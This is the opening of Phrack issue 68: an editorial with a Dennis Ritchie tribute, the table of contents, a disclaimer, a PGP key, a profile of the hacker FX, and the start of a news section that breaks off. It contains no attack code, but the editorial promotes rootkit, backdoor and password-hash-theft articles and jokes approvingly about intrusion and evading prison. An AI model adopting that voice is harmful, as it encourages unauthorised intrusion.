24086 lines
953 KiB
Plaintext
24086 lines
953 KiB
Plaintext
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x01 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ Introduction ]=----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ April 14, 2012 ]=-------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
"C is quirky, flawed, and an enormous success."
|
|
-- Dennis Ritchie
|
|
|
|
October 2011, a legend has fallen...
|
|
|
|
_____.______.______._____
|
|
\`\ /'/
|
|
\ | | /
|
|
>|___,____,____,___|<
|
|
/d$$$P ,ssssssssssss. \
|
|
/d$$$P ,d$$$$$$$$$$$$$b \
|
|
<=====w======w======w=====>
|
|
\ \____> \_____/ <____/ /
|
|
\_____________________/ pb
|
|
|
|
|
|
Dennis Ritchie, proud father of nothing less than our beloved C language
|
|
and UNIX operating system, is gone. While the world has been crying over
|
|
the loss of Steve Jobs, little has been written about Dennis' death. Saying
|
|
that his inventions influenced the hacking community in a way even he
|
|
probably never knew is _not_ an exaggeration. Think about it: how many of
|
|
us became hackers because we discovered C, related bugs or UNIX?
|
|
|
|
Dennis, the world might not be aware of your unbelievable contribution but
|
|
we are. Farewell dear friend, may you rest in peace.
|
|
|
|
-- anonymous bug hunter
|
|
|
|
|
|
-----( Dark Thoughts )-----
|
|
|
|
Today I woke up thinking about the death of this Chinese little girl [1]. I
|
|
felt bad. It's true that watching the youtube video was disturbing but
|
|
something kept hitting my mind. What if the incident had occurred in my
|
|
country? Would people really have behaved any differently? I have doubts.
|
|
Just because a video leaked on the Internet people conveniently blamed
|
|
China, a country both controverted and feared.
|
|
|
|
What if the modern society in general was tending to slowly become amoral
|
|
and cold? A proof is that we all watched this video fully aware of its
|
|
content. Vicious, aren't we? But not only that. We're also fucking cowards.
|
|
Suddenly discovering that there is a darkness hidden inside the very roots
|
|
of our society is dramatic. But pretending to ignore the fact that there
|
|
are countries in this world where atrocious massacres are part of the daily
|
|
life seems fine.
|
|
|
|
It was written in the US Declaration of Independence that "We hold these
|
|
truths to be self-evident, that all men are created equal [...]". How could
|
|
that possibly be true? This morning I was at home, healthy, comfortably
|
|
sitting in front of my computer screen, with a cup of coffee in hand. A few
|
|
minutes later, I was working (or luxuriously pretending to be) to earn
|
|
money that I spent in the bar that night with my friends. In the mean time,
|
|
not so far away, people were killed, raped, mutilated. The truth is that I
|
|
don't even care when I think about it. This morning I was pretending being
|
|
concerned for other people, but tonight I don't give a shit anymore.
|
|
|
|
Something must be wrong.
|
|
|
|
-- anonymous coward / Phrack
|
|
|
|
|
|
[1] http://www.chinapost.com.tw/china/national-news/2011/10/21/320549/
|
|
Chinese-girl.htm
|
|
|
|
|
|
-----( Phrack Issue #68 )-----
|
|
|
|
Hello Phrackers! How are you guys doing? We hope well. We hope your latest
|
|
exploit works reliably (again) and all your bounces are alive and pinging.
|
|
We also hope you and your friends still are out of prison, or recently came
|
|
out (wink wink). Us, we're doing good. Looks like we did it again and a new
|
|
release is here. Ya-hoo.
|
|
|
|
This release brings you an amazing selection of hacking goodies. We have
|
|
two papers on applied cryptanalysis by greg and SysK, an area in which we
|
|
hope to see more submissions for the next issues. We are also thrilled
|
|
about the return of the Art of Exploitation section. And what a return; we
|
|
have for you not one, but two detailed papers demonstrating that
|
|
exploitation is indeed an art form. Speaking of exploitation, did you ever
|
|
wonder what Firefox, FreeBSD and NetBSD have in common? Read the paper by
|
|
argp & huku and find out. Are you hacking Windows' farms? Be sure to check
|
|
the p1ckp0ck3t's novel approach of stealing Active Directory password
|
|
hashes. Perhaps you prefer malware analysis and identification of malware
|
|
families; Pouik and G0rfi3ld have written a paper with a focus on Android
|
|
malware that will satisfy you. Android is quickly becoming the standard
|
|
mobile platform. I think it's time for an Android/ARM kernel rootkit. Start
|
|
from dong-hoon you's paper and hack your own. styx^ continues the kernel
|
|
fun with a paper that updates truff's LKM infection techniques to 2.6.x and
|
|
3.x Linux kernels. If for whatever reason you're afraid of messing with
|
|
your kernels, Crossbower shows you how to create a stealthy userland
|
|
backdoor without creating new processes or threads.
|
|
|
|
We also believe that you will find merit with the two main non technical
|
|
papers of this issue. Both address more or less the same topics, but from
|
|
two totally different points of view. On one hand, we have an analysis of
|
|
how the happiness that hacking brings to all of us can and is corrupted by
|
|
the security industry. One the other, a call to all hackers to take a side
|
|
between staying true to the spirit of hacking and selling out to the
|
|
military intelligence industrial complex. Read them, think about them and
|
|
take a side. Remember, "The hottest places in hell are reserved for those
|
|
who in times of great moral crisis maintain their neutrality".
|
|
|
|
Phrack World News is also making a comeback, courtesy of TCLH. In
|
|
International Scenes we explore Korea and the past of the Greek scene.
|
|
Loopback has increased and we decided to resurrect Linenoise as we had some
|
|
tiny but not less interesting submissions. While being eligible for an
|
|
issue remains hard, submitting for Linenoise may be an easier way for
|
|
people to share tricks in the next issues.
|
|
|
|
We are proud to have FX prophiled in this epic issue. As an added gift, FX
|
|
wrote a eulogy for PH-Neutral, at least in its original form. PH-Neutral,
|
|
as all great hacker creations, lives on as long as the hackers behind it
|
|
are fueling it with their passion.
|
|
|
|
Speaking of hacker passion, this issue re-establishes a long lost
|
|
connection. Phrack and SummerCon are again bonded on the 25th anniversary
|
|
of SummerCon! Shmeck and redpantz, representing SummerCon, contribute two
|
|
papers; a history of the conference from its beginning in 1987 to this
|
|
year, and of course one of the Art of Exploitation papers.
|
|
|
|
Believe it or not it was _fucking_ hard to prepare this issue. It's no news
|
|
that the mentality of the hacking community has changed, but this time we
|
|
had to face multiple deceptions. It's not the first time, however the
|
|
quantity makes this event scary. It demonstrates how rotten and corrupted
|
|
the so-called spirit of some people pretending to be part of the
|
|
underground has become.
|
|
|
|
There's a time when you realize that you've lost count of the battles you
|
|
lost, but you still kinda won enough to keep faith. More importantly, you
|
|
realize that you still care. Granted, it's not the deep, mystical and life
|
|
changing moment that movies display -- the huge pile of shit you pushed out
|
|
of the door just before getting to sleep is still there. It maybe just
|
|
stinks a little less.
|
|
|
|
But we care, hell, we really care about Phrack and what it means. It costs
|
|
time and frustration, many battles lost, it faces the two-point-oh
|
|
revolution (lots of quality stuff goes into blogs, for immediate
|
|
consumption) and the money drop by the security industry, but the
|
|
satisfaction of seeing it out again is huge. Yes, we care.
|
|
|
|
And that's not just because we're a bunch of old farts that stay attached
|
|
to the past. We care because it's a constant, maybe feeble but constant,
|
|
heartbeat of that world, that community that we grew up and now live in.
|
|
You know, that little thing called 'the Underground' that we are proud and
|
|
honored to somehow, in part, represent.
|
|
|
|
We've heard from many corners that 'the Underground' is dead. We'd love to
|
|
hear those people describe what the Underground is, then. Sure, things
|
|
change, evolve. Laws, computing power, money invested, political links,
|
|
technology, every piece moves fast and reshapes the landscape. But if
|
|
you're reading these lines today, if you've just finished a 36-hour
|
|
coding, hacking marathon, you're keeping it alive.
|
|
|
|
So thank you, for that. Thank you to the authors for finding the time of
|
|
sharing their knowledge. Thank you to anyone that setups a new connection.
|
|
Thank you to whomever fights for information and freedom. Thanks crews.
|
|
|
|
Happy hacking, Phrackers.
|
|
You guys are the BEST heartbeat in the world.
|
|
|
|
|
|
-- the Phrack staff
|
|
|
|
|
|
______ _ _ ______ ______ _ _ __ _ __ _____
|
|
(_____ \| | | (_____ \ /\ / _____) | / ) _| || |_ / / / ___ \
|
|
_____) ) |__ | |_____) ) / \ | / | | / / (_ || _) / /_ ( ( ) )
|
|
| ____/| __)| (_____ ( / /\ \| | | |< < _| || |_ / __ \ > > < <
|
|
| | | | | | | | |__| | \_____| | \ \ (_ || _| (__) | (___) )
|
|
|_| |_| |_| |_|______|\______)_| \_) |__||_| \____/ \_____/
|
|
|
|
|
|
- By the community, for the community. -
|
|
|
|
|
|
$ cat p68/index.txt
|
|
|
|
<--------------------------( Table of Contents )-------------------------->
|
|
|
|
0x01 Introduction ...................................... Phrack Staff
|
|
|
|
0x02 Phrack Prophile on FX ............................. Phrack Staff
|
|
|
|
0x03 Phrack World News ................................. TCLH
|
|
|
|
0x04 Linenoise ......................................... various
|
|
|
|
0x05 Loopback .......................................... Phrack Staff
|
|
|
|
0x06 Android Linux Kernel Rootkit ...................... dong-hoon you
|
|
|
|
0x07 Happy Hacking ..................................... Anonymous
|
|
|
|
0x08 Practical cracking of white-box implementations ... SysK
|
|
|
|
0x09 Single Process Parasite ........................... Crossbower
|
|
|
|
0x0a Pseudomonarchia jemallocum ........................ argp & huku
|
|
|
|
0x0b Infecting loadable kernel modules ................. styx^
|
|
|
|
0x0c The Art of Exploitation:
|
|
MS IIS 7.5 Remote Heap Overflow ................... redpantz
|
|
|
|
0x0d The Art of Exploitation:
|
|
Exploiting VLC, a jemalloc case study ............. huku & argp
|
|
|
|
0x0e Secure Function Evaluation vs. Deniability in OTR
|
|
and similar protocols ............................. greg
|
|
|
|
0x0f Similarities for Fun and Profit ................... Pouik & G0rfi3ld
|
|
|
|
0x10 Lines in the Sand: Which Side Are You On in the
|
|
Hacker Class War .................................. Anonymous
|
|
|
|
0x11 Abusing Netlogon to steal an Active Directory's
|
|
secrets ........................................... the p1ckp0ck3t
|
|
|
|
0x12 25 Years of SummerCon ............................. Shmeck
|
|
|
|
0x13 International Scenes .............................. various
|
|
|
|
<------------------------------------------------------------------------->
|
|
|
|
|
|
-----( GreetZ for issue #68 )-----
|
|
|
|
- FX: epicness personified
|
|
- herm1t: you have our support
|
|
- TCLH: for everything
|
|
- x82: deepest apologies for the 1 year wait
|
|
- anonymous authors: best part of this issue
|
|
- sysk: keep submitting man!
|
|
- redpantz & Shmeck: Phrack and SummerCon bonded again
|
|
- greg: schooling Alice and Bob
|
|
- Crossbower: parasite zoologist
|
|
- the p1ckp0ck3t: be wary or he will get your hashes
|
|
- huku & argp: the scourge of memory allocators
|
|
- styx^: yes we are hardcore reviewers
|
|
- Pouik & G0rfi3ld: who the hell is G0rfi3ld??? ;>
|
|
- scene phile writers: you have big balls guyz
|
|
- linenoise writers: Eva you're soooooooo cute :3
|
|
- our generous hoster: a contribution not forgotten ;)
|
|
- z4ppy, ender: external reviews are paid in beers
|
|
- b3n: too bad we didn't use your stuff
|
|
- No greetz, no thankz to: you know who you are :<
|
|
|
|
And of course many thanks to the loopback contributors :')
|
|
|
|
|
|
-----( Phrack Magazine's policy )-----
|
|
|
|
phrack:~# head -n 22 /usr/include/std-disclaimer.h
|
|
/*
|
|
* All information in Phrack Magazine is, to the best of the ability of
|
|
* the editors and contributors, truthful and accurate. When possible,
|
|
* all facts are checked, all code is compiled. However, we are not
|
|
* omniscient (hell, we don't even get paid). It is entirely possible
|
|
* something contained within this publication is incorrect in some way.
|
|
* If this is the case, please drop us some email so that we can correct
|
|
* it in a future issue.
|
|
*
|
|
*
|
|
* Also, keep in mind that Phrack Magazine accepts no responsibility for
|
|
* the entirely stupid (or illegal) things people may do with the
|
|
* information contained herein. Phrack is a compendium of knowledge,
|
|
* wisdom, wit, and sass. We neither advocate, condone nor participate
|
|
* in any sort of illicit behavior. But we will sit back and watch.
|
|
*
|
|
*
|
|
* Lastly, it bears mentioning that the opinions that may be expressed in
|
|
* the articles of Phrack Magazine are intellectual property of their
|
|
* authors.
|
|
* These opinions do not necessarily represent those of the Phrack Staff.
|
|
*/
|
|
|
|
-----( Contact Phrack Magazine )-----
|
|
|
|
|
|
< Editors : staff[at]phrack{dot}org >
|
|
> Submissions : staff[at]phrack{dot}org <
|
|
< Commentary : loopback[@]phrack{dot}org >
|
|
> Phrack World News : pwned[at]phrack{dot}org <
|
|
|
|
|
|
Submissions may be encrypted with the following PGP key:
|
|
(Hint: Always use the PGP key from the latest issue)
|
|
|
|
|
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|
Version: PHRACK
|
|
|
|
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
|
|
=cK7U
|
|
-----END PGP PUBLIC KEY BLOCK-----
|
|
|
|
-----( EOF )-----
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x02 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ FX of Phenoelit ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|=---=[ Specifications
|
|
|
|
Handle: FX
|
|
AKA: 41414141
|
|
Handle origin: First and last letter of my first name
|
|
(I had no idea it had a meaning in movie production)
|
|
Produced in: East Germany
|
|
Urlz: http://www.phenoelit.de/
|
|
Computers: Metric tons of them
|
|
Creator of: much crappy and useless code
|
|
Member of: Phenoelit, Toolcrypt
|
|
Projects: PH-Neutral, Phonoelit
|
|
Codez: IRPAS (bunch of tools that somehow still cause havoc)
|
|
cd00r.c (later called PortKnocking by the copycats)
|
|
works-on-my-machine exploits
|
|
Active since: late 80s
|
|
Inactive since: unlikely to happen
|
|
|
|
|=---=[ Favorites
|
|
|
|
Actors: don't care
|
|
Films: Hackers (1995) - imagine it actually would be like that
|
|
Authors: Neal Stephenson, Iain M. Banks, Frank & Brian Herbert
|
|
Meetings: Bars
|
|
Sex: ACK
|
|
Books: Computer Security, Time-Life Books (1986), and it began
|
|
Novel: too many to list
|
|
Music: Progressive House Kitsch
|
|
Alcohol: Oh Yes!
|
|
Cars: Mercedes-Benz
|
|
Girls: SYN
|
|
Foods: German
|
|
I like: honesty, pragmatism, realism, tolerance, style, empathy
|
|
I dislike: fakes, aggression, ignorance, senselessness, deception
|
|
|
|
|=---=[ Describe your life in 3 sentences
|
|
|
|
Every work day is packed with challenges, great hacks and awesome people.
|
|
Every free day compensates with non-security hobbies and sleep.
|
|
This sentence is padding.
|
|
|
|
|=---=[ First contact with computers
|
|
|
|
At the age of 6 at the computing department of the university of Sofia,
|
|
Bulgaria. Didn't leave much of an impression, as I was only allowed to play
|
|
a silly game (in CGA color).
|
|
|
|
Second contact happened at the age of 9 or 10, a Robotron Z9001. It came
|
|
without software but with a typewriter made programming manual for BASIC.
|
|
I read it cover to cover.
|
|
|
|
|=---=[ Passions: What makes you tick
|
|
|
|
Like-minded people: Conversations give me the greatest boost. Let me
|
|
explain something to a person who gets it, and I will have a new idea how
|
|
to take it further.
|
|
|
|
Also, work. That state of a problem where it is no longer fun, but actual
|
|
work, to get it where you want it. Not letting go. Stubbornness compensates
|
|
for a lot of talent.
|
|
|
|
|=---=[ Unix or Windows? Juniper or Cisco?
|
|
|
|
Unix and Windows. I like both, I use both, they both suck in their own
|
|
ways. The only thing you will not see me with is anything Apple.
|
|
|
|
Juniper, Cisco, all networking equipment is broken, Cisco being in the
|
|
lead. How can you sell equipment that is in most cases simply forwarding
|
|
IPv4 packets from interface 1 to interface 2 since 1987 and still crash on
|
|
parsing IPv4 in 2011?
|
|
|
|
|=---=[ Color of hat?
|
|
|
|
undef($hat);
|
|
|
|
|=---=[ Entrance in the underground
|
|
|
|
First contact must have been around 1990. Shortly after the Berlin wall
|
|
came down, I got my first 80286 machine and hung out at a computer club in
|
|
a Thaelmann Pionieers' (youth organization of schoolchildren in East
|
|
Germany) youth center. In a back room, two older guys downloaded infrared
|
|
images from Russian satellites. While the download ran, they cracked PC
|
|
games for the kids to pass the time. First time I saw a hex dump.
|
|
|
|
I had the great honor to meet many people that I consider(ed) part of the
|
|
real underground. Some of them still are. But I don't think I was ever part
|
|
of that myself.
|
|
|
|
|=---=[ Which research have you done or which one gave you the most fun?
|
|
|
|
Anything I did was fun at the time, why doing it otherwise? I generally
|
|
like fiddling around with Bits and bytes more than hunting bugs in large
|
|
environments. Writing disassemblers, debuggers and the like is a pleasure.
|
|
It's also monkey work. But it lets you feel so much about the history and
|
|
design of a platform.
|
|
|
|
I also like network protocols, because you can often see the vulnerability
|
|
potential by reading the specifications already. Protocols are interfaces
|
|
and interfaces are where the bugs live. Also, logging functions love to use
|
|
packet contents and fixed buffers.
|
|
|
|
|=---=[ Personal general opinion about the underground
|
|
|
|
Much. Fucking. Respect.
|
|
|
|
Seriously, what is published is only the tip of an iceberg. Once you talk
|
|
to people, it's simply insane how much knowledge there is. Interestingly,
|
|
I have the impression that little of this knowledge is ever used.
|
|
|
|
One aspect often considered essential in the underground I dislike:
|
|
Owning people fails to impress me. It's like beating people up, everyone
|
|
can do that and none of it makes it an achievement. If you found that
|
|
vulnerability yourself and made a custom exploit, that's an achievement.
|
|
|
|
|=---=[ Personal general opinion about the German underground
|
|
|
|
Regardless of the definition of underground, the hacking scene in Germany
|
|
is very alive and diverse. However, I would love to see more of them
|
|
write exploits.
|
|
|
|
|=---=[ Personal general opinion about the European underground
|
|
|
|
The U.S. is much more visible, but Old Europe kicks their ass any time.
|
|
Just looking at the French scene is scary. If only they would speak
|
|
English ;) And don't even get me started on east Europe and Russia.
|
|
|
|
|=---=[ Memorable experiences/hacks
|
|
|
|
- Finding my first overflow in Cisco IOS TFTP, resisting the urge to post
|
|
it immediately and deciding to write an exploit. Then realizing how much
|
|
of a journey lay ahead of me, since I had never written any exploit
|
|
before.
|
|
|
|
- Writing an exploit that needed to be stable, i.e. work in the wild. After
|
|
weeks of frustration finally understanding that PoC is only 10% of
|
|
exploit development. Halvar saving my ass again with a simple hint.
|
|
|
|
- Being asked by my employer to take the CISSP exam, being initially
|
|
rejected due to my "connections to hackers" as a DEFCON speaker, being
|
|
allowed to take the exam and finding a 12 octet MAC address in a
|
|
question. Finding out afterwards that (ISC)2 probably has more admin
|
|
users on their web servers than paying members.
|
|
|
|
- Asking someone to look at Cisco IOS exploitation after I spent about
|
|
a decade with it and getting my ass kicked in less than a week. True
|
|
talent trumps everything.
|
|
|
|
- Caesar's Challenge over the years: hearing about it, being invited in,
|
|
being told by Caesar that he accepts my solution, welcoming Caesar to
|
|
PH-Neutral.
|
|
|
|
- Being invited to train a team of hackers and later finding out that
|
|
the whole purpose of the exercise was to cure them from their respect
|
|
for me. And it worked.
|
|
|
|
- The nights in Wuxi (China) with the Wuxi Pwnage Team.
|
|
|
|
|=---=[ Memorable people you have met
|
|
|
|
- Halvar Flake
|
|
I have to thank this man for a lot of things in my life.
|
|
|
|
- Sergey Bratus
|
|
A great man with a great vision. He changed how I look at academia and
|
|
hacking. With people like Sergey, there is hope.
|
|
|
|
- John Lambert
|
|
One of the smartest men I've ever met. Just in case you wonder why
|
|
Windows exploitation is so challenging today.
|
|
|
|
- Dan Kaminsky
|
|
Dan and I share a passion for protocols. We first met in 2002, about five
|
|
times, at cons all over the planet, and talked IP(v4). Good times.
|
|
|
|
- ADM, that one summer
|
|
|
|
|=---=| Memorable places you have been to
|
|
|
|
- Idaho Falls
|
|
|
|
|=---=[ Disappointing people you have met
|
|
|
|
Many manufactured or self-styled experts giving presentations at
|
|
conferences. If you didn't write or at least read the code in question,
|
|
shut up. The number of charlatans is unfortunately growing steadily.
|
|
Some would probably count me in that category as well.
|
|
|
|
Also, friends that betray they very people that trust them most.
|
|
|
|
|=---=[ Who came up with the name "Phenoelit" and what does it mean?
|
|
|
|
Nothing to see here, move on.
|
|
|
|
|=---=[ Who are you guys?
|
|
|
|
Just friends.
|
|
|
|
|=---=[ Who designed those awesome Phenoelit t-shirts?
|
|
|
|
I always did the designs for Phenoelit and PH-Neutral. I greatly enjoy
|
|
doing them. For PH-Neutral, the process was that I had to come up with a
|
|
motive and would do all the work, Mumpi watching me, drinking beer and
|
|
complaining. It would not have worked any other way.
|
|
|
|
|=---=[ Phenoelit vs 7350 vs THC?
|
|
|
|
We met 7350 and THC first time at the 17c3 and became friends with several
|
|
of them over time. I sincerely miss 7350, but their time had come.
|
|
|
|
|=---=[ Things you are proud of
|
|
|
|
The team I am blessed to work with.
|
|
|
|
|=---=[ Things you are not proud of
|
|
|
|
- Writing shitty exploits
|
|
- Having a pretty good hand at picking research topics that are not
|
|
relevant to the real world
|
|
- Being strictly single-tasking
|
|
|
|
|=---=[ Most impressive hackers
|
|
|
|
- Dvorak
|
|
- Halvar Flake
|
|
- Philippe Biondi
|
|
- Ilja van Sprundel
|
|
- Anonpoet
|
|
- Greg
|
|
- Last Stage of Delirium
|
|
|
|
This list is biased by me not knowing many of the really impressive
|
|
hackers.
|
|
|
|
|=---=[ Opinion about security conferences
|
|
|
|
Security conferences have been essential for my personal development and I
|
|
still love to go to them. I have a preference for smaller cons, since it is
|
|
more likely to get to talk to people.
|
|
Almost any talk has something for me to take away. But more important is
|
|
the hallway track and going out with fellow hackers.
|
|
|
|
The distinction between hacker cons and corporate or product security
|
|
conferences used to be clear. It is no longer, which is sad.
|
|
|
|
|=---=[ Opinion on Phrack Magazine
|
|
|
|
IMHO one of the most well regarded e-zines in the world, influencing much
|
|
research over the time of its existence. Just look at how many academic
|
|
publications cite Phrack articles. Keep it up!
|
|
|
|
|=---=[ What you would like to see published in Phrack?
|
|
|
|
I think Phrack does just fine. For me, exploitation techniques are at
|
|
the heart of Phrack. I also enjoy reading about environments that not
|
|
many people have access to: control systems of all kinds, for example.
|
|
|
|
Maybe you should aim for more timely releases though.
|
|
|
|
|=---=[ Personal advices for the next generation
|
|
|
|
That implies that I'm old and expired, right?
|
|
|
|
The one advice I would give is: Don't care about the opinion of others when
|
|
it comes to research. It doesn't matter if they think it's cool, you must
|
|
think it's cool. Look for and credit prior art, build on what is there
|
|
already and have fun doing so.
|
|
|
|
And if you really have to use Python, understand that error handling is not
|
|
the same thing as stack traces. Catch your exceptions and handle them, or
|
|
at least display something useful.
|
|
|
|
|=---=[ Your opinion about the future of the underground
|
|
|
|
Predictions are hard, especially when they concern the future.
|
|
|
|
|=---=[ Shoutouts to specific (group of) peoples
|
|
|
|
To the hacker and vx groups of the 80s and 90s, who built the foundation
|
|
of everything we still concern ourselves with today.
|
|
|
|
|=---=[ Flames to specific (group of) peoples
|
|
|
|
To the snake-oil security product vendors, who refuse to innovate and bind
|
|
available talent in signature writing sweat jobs, because that model pays
|
|
them so well. Your "protections" add vulnerabilities to every aspect of
|
|
modern networks, and you know it. The halting problem is UNDECIDABLE!
|
|
|
|
|=---=[ Quotes
|
|
|
|
"Does it just look nice or is it correct?"
|
|
- zynamics developer about a control flow graph
|
|
|
|
"Nine out of the ten voices in my head say I'm not schizophrenic. The
|
|
other one hums the melody of Tetris."
|
|
|
|
|=---=[ Anything more you want to say
|
|
|
|
I would like to thank the Phrack staff for this honor, although I'm still
|
|
convinced there are 0x100 people who deserved it more.
|
|
|
|
|=---=[ A eulogy for PH-Neutral ]=---=|
|
|
|
|
We created PH-Neutral in 0x7d3 as an attempt to bring together the people
|
|
we respected most. We were simply unaware of the other small events that
|
|
already existed. The intention was to have an informal meeting with ad-hoc
|
|
workshops and a great party. We failed at the party, despite a full-blown
|
|
dance floor. However, the people actually worked together and discussed
|
|
their projects and exploits. We were sending out the invitations
|
|
individually by email and I was surprised about the many positive
|
|
reactions. We would not have thought that so many well-known and
|
|
interesting people would actually show up.
|
|
|
|
Over the years, the event grew. Although we kept it invite-only, the
|
|
mechanism for invitations had to consider people that were there in the
|
|
past as well as fresh blood. Therefore, one way or another, it had a snow
|
|
ball effect to it. But in the early years, this was a good thing. There
|
|
was an astonishing amount of innovation going on during the first five
|
|
years. We never expected to see people actually working together. It was
|
|
the time of sharing code and knowledge, of searching for JTAG on a dance
|
|
floor and of the Vista ASLR release.
|
|
|
|
The bigger the event got, the more the focus shifted from hacking to party.
|
|
Since that corresponded with our second initial goal, we did encourage it.
|
|
We really like to party with our friends, and by party we mean actual
|
|
dancing and not just standing around and getting drunk. It was amazing
|
|
to see how well the party developed over the years. Despite the growth,
|
|
it still had a very intimate feeling.
|
|
|
|
Initially meant as a joke during setup of the second PH-Neutral, we had
|
|
decided to not have it run forever. For one, we didn't want to see it going
|
|
down and fading away. When more and more conferences started to show up on
|
|
the map, it only encouraged us to conclude the story of PH-Neutral. It had
|
|
its time and place.
|
|
|
|
The last PH-Neutral 0x7db then proved that the decision was right. It was
|
|
that little bit of too many people that turns a large group of
|
|
international friends into a somewhat anonymous crowd. Although luckily
|
|
not many guests noticed, it changed the way we had to run the event
|
|
completely. Where in the years before, we could hack and party with our
|
|
friends, we had to fire-fight, manage and regulate. That was not the way it
|
|
was meant to be for us, so it was a good time to call it quits.
|
|
|
|
PH-Neutral was made into what it was by the people that participated, more
|
|
so than any other event I know. The people decided on the spin of each
|
|
year's event by how they filled the frame we gave them. It was their
|
|
party and they took it and made it great. Thank you forever!
|
|
|
|
[ EOF ]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x03 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ Phrack World News ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------------=[ by TCLH ]=------------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
It is been a while since the last Phrack World News, and much has happened
|
|
in our world since then. Governments have been overthrown [1], human rights
|
|
partially restored in one country, and taken away in the next [2]. The
|
|
so-called first world has been bought, delivers monitoring and suppression
|
|
equipment to totalitarian countries [3] as well as making its use a legal
|
|
